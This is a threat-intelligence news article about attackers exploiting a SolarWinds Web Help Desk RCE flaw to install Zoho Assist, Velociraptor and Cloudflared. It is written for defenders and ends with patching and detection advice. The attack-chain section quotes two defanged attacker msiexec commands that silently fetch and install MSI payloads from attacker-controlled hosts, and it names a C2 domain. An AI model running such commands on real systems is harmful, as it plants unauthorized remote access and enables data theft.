Hackers Exploit SolarWinds Web Help Desk Vulnerability to Deploy Remote Management Tools
A critical remote code execution (RCE) vulnerability in SolarWinds Web Help Desk (WHD) is currently being actively exploited by cyber attackers. These threat actors are leveraging the flaw to deploy legitimate administrative tools, thereby gaining unauthorized access and control over affected systems.
Scope of the Exploitation
Security firm Huntress has identified that 84 endpoints across 78 organizations within its partner network are running vulnerable versions of SolarWinds WHD. This widespread exposure underscores the urgency for organizations to address the vulnerability promptly.
Attack Methodology
The exploitation sequence observed by Huntress is as follows:
1. Initial Compromise: The attack begins with the execution of `wrapper.exe`, the WHD service wrapper, which subsequently launches `java.exe`, the underlying Tomcat-based application.
2. Payload Deployment: The Java process then executes `cmd.exe` to silently install a remote MSI payload using the following command:
“`
msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
“`
This command fetches and installs a Zoho ManageEngine Remote Monitoring and Management (RMM) agent, specifically Zoho Assist, from the Catbox file-hosting service.
3. Establishing Remote Access: Zoho Assist, while a legitimate remote management tool, is exploited in this context to provide persistent, unattended access to the compromised system. The agent registers to an attacker-controlled Zoho account linked to a Proton Mail address, granting the attacker immediate interactive control over the system.
Alignment with Previous Advisories
This attack pattern aligns closely with Microsoft’s advisory issued on February 6, which confirmed in-the-wild exploitation of SolarWinds WHD vulnerabilities for RCE and subsequent deployment of remote management tools.
Post-Exploitation Activities
Once the RMM agent is active, attackers engage in several post-exploitation activities:
– Reconnaissance: Utilizing the Zoho RMM process (`TOOLSIQ.EXE`), attackers perform Active Directory reconnaissance to enumerate domain-joined systems.
– Deployment of Additional Tools: Attackers deploy Velociraptor, an open-source Digital Forensics and Incident Response (DFIR) platform, via another silent MSI installer hosted on an attacker-controlled Supabase bucket:
“`
msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/…/v4.msi
“`
Velociraptor is configured to communicate with attacker infrastructure hosted behind a Cloudflare Worker (`auth.qgtxtebl.workers[.]dev`), a tactic previously associated with ToolShell exploitation and Warlock ransomware activity.
– Execution of Malicious Commands: The attacker executes a series of base64-encoded PowerShell commands to disable Windows Defender and the Windows Firewall via registry modifications. This is followed by the installation of Cloudflared from GitHub’s official release channel, creating a secondary tunnel-based access path for redundancy.
– Data Exfiltration: System information is collected using the `Get-ComputerInfo` command and exfiltrated directly into an attacker-controlled Elastic Cloud deployment via the Bulk API. This method repurposes Elastic’s SIEM tooling to build a centralized victim management and triage platform.
Implications for Organizations
This campaign highlights the rapid progression from initial exploitation of an internet-exposed management interface to full interactive control and persistence within enterprise environments. The use of legitimate tools like Zoho Assist and Velociraptor allows attackers to blend their activities with normal administrative operations, making detection more challenging.
Recommendations
Organizations using SolarWinds Web Help Desk should take the following actions immediately:
1. Apply Patches: Ensure that all instances of SolarWinds WHD are updated to the latest version that addresses the RCE vulnerability.
2. Monitor for Indicators of Compromise (IoCs): Review system logs for unusual activities, such as unexpected installations of remote management tools or execution of PowerShell commands.
3. Restrict Internet Exposure: Limit the exposure of management interfaces to the internet by implementing network segmentation and access controls.
4. Enhance Detection Capabilities: Deploy endpoint detection and response (EDR) solutions to identify and mitigate malicious activities promptly.
5. Conduct Security Awareness Training: Educate IT staff about the risks associated with remote management tools and the importance of maintaining secure configurations.
By implementing these measures, organizations can reduce the risk of exploitation and enhance their overall security posture.
